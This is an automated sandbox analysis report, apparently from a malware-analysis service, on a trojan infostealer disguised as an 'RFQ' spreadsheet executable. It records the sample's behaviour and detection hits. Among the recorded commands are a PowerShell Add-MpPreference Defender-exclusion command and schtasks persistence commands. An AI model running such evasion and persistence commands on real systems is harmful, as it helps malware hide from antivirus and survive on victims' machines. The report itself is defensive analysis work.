                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 0_2_06BFDD000_2_06BFDD00
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 0_2_06BF7AB90_2_06BF7AB9
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 0_2_06BF7AC80_2_06BF7AC8
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 0_2_06BFF8100_2_06BFF810
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_014F94209_2_014F9420
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_014F9BE09_2_014F9BE0
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_014F4A689_2_014F4A68
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_014F3E509_2_014F3E50
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_014FCE609_2_014FCE60
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_014F41989_2_014F4198
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_066D2EF09_2_066D2EF0
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_066D56D09_2_066D56D0
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_066D3F489_2_066D3F48
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_066DDC309_2_066DDC30
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_066DBCF89_2_066DBCF8
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_066D9AD89_2_066D9AD8
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_066D8B889_2_066D8B88
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_066D00409_2_066D0040
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_066D36409_2_066D3640
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_066D4FF09_2_066D4FF0
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_06811DAE9_2_06811DAE
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_06811DC89_2_06811DC8
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_071C4C489_2_071C4C48
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeCode function: 9_2_071C00409_2_071C0040
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 10_2_016DDE8C10_2_016DDE8C
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 10_2_050D258810_2_050D2588
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 10_2_050D257810_2_050D2578
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 10_2_050D4C1810_2_050D4C18
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 10_2_0730745810_2_07307458
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 10_2_0730210610_2_07302106
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 10_2_0730E57010_2_0730E570
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 10_2_0730744910_2_07307449
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 10_2_0730523010_2_07305230
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 10_2_0730521F10_2_0730521F
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 10_2_0730E13810_2_0730E138
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 10_2_0730DD0010_2_0730DD00
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 10_2_07302C3810_2_07302C38
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 10_2_07307AB910_2_07307AB9
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 10_2_07307AC810_2_07307AC8
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 10_2_0730F81010_2_0730F810
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_00F24A6816_2_00F24A68
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_00F29BE016_2_00F29BE0
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_00F2CE6016_2_00F2CE60
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_00F23E5016_2_00F23E50
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_00F2419816_2_00F24198
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05D6BCF816_2_05D6BCF8
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05D63F4816_2_05D63F48
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05D656D016_2_05D656D0
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05D62EF016_2_05D62EF0
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05D6004016_2_05D60040
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05D68B7A16_2_05D68B7A
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05D69AD816_2_05D69AD8
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05D64FF016_2_05D64FF0
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05D6362F16_2_05D6362F
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05EA1DC816_2_05EA1DC8
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_05EA1DBA16_2_05EA1DBA
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_06854C4816_2_06854C48
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeCode function: 16_2_0685004016_2_06850040
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exeStatic PE information: invalid certificate
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2070955375.00000000088F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs RFQ-101432620247fl#U00e2#U00aexslx.exe
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000000.2012931126.0000000000554000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameKZAH.exe" vs RFQ-101432620247fl#U00e2#U00aexslx.exe
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2063886948.00000000028CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename93176932-712c-4cc3-b1ef-f9b971c9a078.exe4 vs RFQ-101432620247fl#U00e2#U00aexslx.exe
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2069571272.0000000008217000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKZAH.exe" vs RFQ-101432620247fl#U00e2#U00aexslx.exe
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename93176932-712c-4cc3-b1ef-f9b971c9a078.exe4 vs RFQ-101432620247fl#U00e2#U00aexslx.exe
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs RFQ-101432620247fl#U00e2#U00aexslx.exe
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2062667965.0000000000B2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ-101432620247fl#U00e2#U00aexslx.exe
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3264863330.00000000012F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs RFQ-101432620247fl#U00e2#U00aexslx.exe
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3264260880.000000000043E000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename93176932-712c-4cc3-b1ef-f9b971c9a078.exe4 vs RFQ-101432620247fl#U00e2#U00aexslx.exe
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exeBinary or memory string: OriginalFilenameKZAH.exe" vs RFQ-101432620247fl#U00e2#U00aexslx.exe
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 10.2.ywKDUBCUA.exe.43ebdd0.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 10.2.ywKDUBCUA.exe.43b11b0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 10.2.ywKDUBCUA.exe.43ebdd0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 10.2.ywKDUBCUA.exe.43b11b0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3bdb0e8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: ywKDUBCUA.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, OTWUo99bfyR.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, OTWUo99bfyR.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, Ui9qhZiA7.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, Ui9qhZiA7.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, BqMB7yHhrXg.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, BqMB7yHhrXg.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, BqMB7yHhrXg.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3ba04c8.5.raw.unpack, BqMB7yHhrXg.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, WXLXx86ylIQfeMsLR5.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, WXLXx86ylIQfeMsLR5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, WXLXx86ylIQfeMsLR5.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, WXLXx86ylIQfeMsLR5.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, WXLXx86ylIQfeMsLR5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, WXLXx86ylIQfeMsLR5.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.3c46370.4.raw.unpack, lMgrnFqi5rRuM663RZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.88f0000.8.raw.unpack, lMgrnFqi5rRuM663RZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.28a3730.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.28ab748.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                      Source: 0.2.RFQ-101432620247fl#U00e2#U00aexslx.exe.6bc0000.7.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/15@1/1
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeFile created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeMutant created: NULL
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeMutant created: \Sessions\1\BaseNamedObjects\amrvdJsEeRNf
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1308:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5012:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9347.tmpJump to behavior
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exeReversingLabs: Detection: 83%
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeFile read: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess created: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmpA374.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess created: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmpA374.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
